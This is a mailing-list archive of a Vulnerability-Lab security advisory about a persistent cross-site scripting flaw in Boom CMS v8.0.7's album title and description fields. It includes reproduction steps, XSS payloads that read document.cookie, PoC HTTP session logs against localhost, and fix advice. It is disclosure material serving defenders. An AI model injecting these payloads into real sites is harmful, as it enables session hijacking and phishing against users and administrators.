[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Boom CMS v8.0.7 - Cross Site Scripting Vulnerability
From: "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date: 2023-07-19 7:06:38
Message-ID: d6f9c1ed-a827-36fc-037c-487f5c15a06c () vulnerability-lab ! com
[Download RAW message or body]
This is an OpenPGP/MIME signed message (RFC 4880 and 3156)
--------------TeeXi98091v4u6gXEMp0hqvs
From: "info@vulnerability-lab.com" <info@vulnerability-lab.com>
Reply-To: info@vulnerability-lab.com
To: fulldisclosure@seclists.org
Message-ID: <d6f9c1ed-a827-36fc-037c-487f5c15a06c@vulnerability-lab.com>
Subject: Boom CMS v8.0.7 - Cross Site Scripting Vulnerability
Content-Type: multipart/mixed; boundary="------------GTqT21y0T4FBBmmUgb0mwOdH"
[Attachment #2 (text/plain)]
Document Title:
===============
Boom CMS v8.0.7 - Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2274
Release Date:
=============
2023-07-03
Vulnerability Laboratory ID (VL-ID):
====================================
2274
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is \
an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. \
Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It \
gives editors control but doesn't require any technical knowledge.
(Copy of the Homepage:https://www.boomcms.net/boom-boom )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site \
vulnerability in the Boom CMS v8.0.7 web-application.
Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom \
CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject own malicious \
script codes with persistent attack vector to compromise browser to web-application requests \
from the application-side.
The vulnerability is located in the input fields of the album title and album description in \
the asset-manager module. Attackers with low privileges are able to add own malformed albums \
with malicious script code in the title and description. After the inject the albums are being \
displayed in the backend were the execute takes place on preview of the main assets. The attack \
vector of the vulnerability is persistent and the request method to inject is post. The \
validation tries to parse the content by usage of a backslash. Thus does not have any impact to \
inject own malicious java-scripts because of its only performed for double- and single-quotes \
to prevent sql injections.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing \
attacks, persistent external redirects to malicious source and persistent manipulation of \
affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] assets-manager (album)
Vulnerable Function(s):
[+] add
Vulnerable Parameter(s):
[+] title
[+] description
Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low \
privileged user account and with low user interaction. For security demonstration or to \
reproduce the persistent cross site web vulnerability follow the provided information and steps \
below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the \
execution 6. Successful reproduce of the persistent cross site web vulnerability!
Payload(s):
> <script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>
--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin:https://localhost:8000
Connection: keep-alive
Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD \
1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", \
"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" \
:null,"deleted_at":null,"created_at":"2021-xx-xx \
xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie:
Vary: Accept-Encoding
Content-Length: 7866
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Vulnerable Source: asset-manager/albums/[ID]
<li data-album="36">
<a href="#albums/20">
<div>
<h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
<p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
<p class='count'><span>0</span> assets</p>
</div>
</a>
</li>
</iframe></p></div></a></li></ul></div></div>
</div>
<div id="b-assets-view-asset-container"></div>
<div id="b-assets-view-selection-container"></div>
<div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
<div class="heading">
<h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT \
CODE PAYLOAD 1!]></h1>
<p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED \
SCRIPT CODE PAYLOAD 2!]></p> </div>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable title and \
description parameters. Restrict the input fields and disallow usage of special chars. Sanitize \
the output listing location to prevent further attacks.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the application is \
estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] \
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.
Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
["OpenPGP_0x1554D09B2933E2FE.asc" (application/pgp-keys)]
["OpenPGP_signature.asc" (OpenPGP_signature.asc)]
-----BEGIN PGP SIGNATURE-----
wsF5BAABCAAjFiEE0BctHpBdnIQSMWpxFVTQmykz4v4FAmS3i34FAwAAAAAACgkQFVTQmykz4v7c
Vg//QouRMVphUfZ9AXOJnaxsLH46/+2gUU8chvAyQ/dxztmuuRLhwvTUFye/Lu0kBIV0sKkPk+zZ
HULAHvTpQ/V5iUf0mYTCtOqLBt9YG69U+iMfvxf0UaxQKIYDS3MUPXQiqxAAHDoReX7HXKABAz7Y
a9AXH3X8wqy7TMt7ZMO1BRS6bBjfkxPGR/tcAXTQPv3yVZvTfj73yefsIwR07RiSqsUg0TdCTHZl
ITDG3dqQ3cmf+PY7yiWmj35Og10hKPzgTn12HjVgGA9LnfJ82biZrrc4uLTwSe99CYNdWsT1+VcS
TYt0H55E0lpshwDnTdOZb9BfWj3YSNCUo/K9a9XpjYpQhR3b9Her17fEHAkAoY8/iIkXJ9vK+4zR
0fXFO1xCplCVU55/0sdS2CKegxPc165jS79hOIPx3FL6drZO4GQxPiJ4q9b9H451nMC/+fL7qg7r
pIFoQvojE0nZCE202tmz9Ed8Gd4c26pTz1uligFzSPu945OyLHo+pwQsyAfOUL2449NCjNEBtmcc
t3qtZiQPOiqT8GUChsYMet1dL3sol4XUrkLTErUF/uIQrITwELI2b8GLxvYqDhv4TJM5v3+VEG1+
Kdb1j0gohor+Bo7ePhnuDM9luE1o4kWmHN20THQtw6udZ7vBkFoYFw1KwM7LLHN9vXnX2/GLO839
pUg=
=zI5K
-----END PGP SIGNATURE-----
--------------TeeXi98091v4u6gXEMp0hqvs--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============6062772322171801088==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic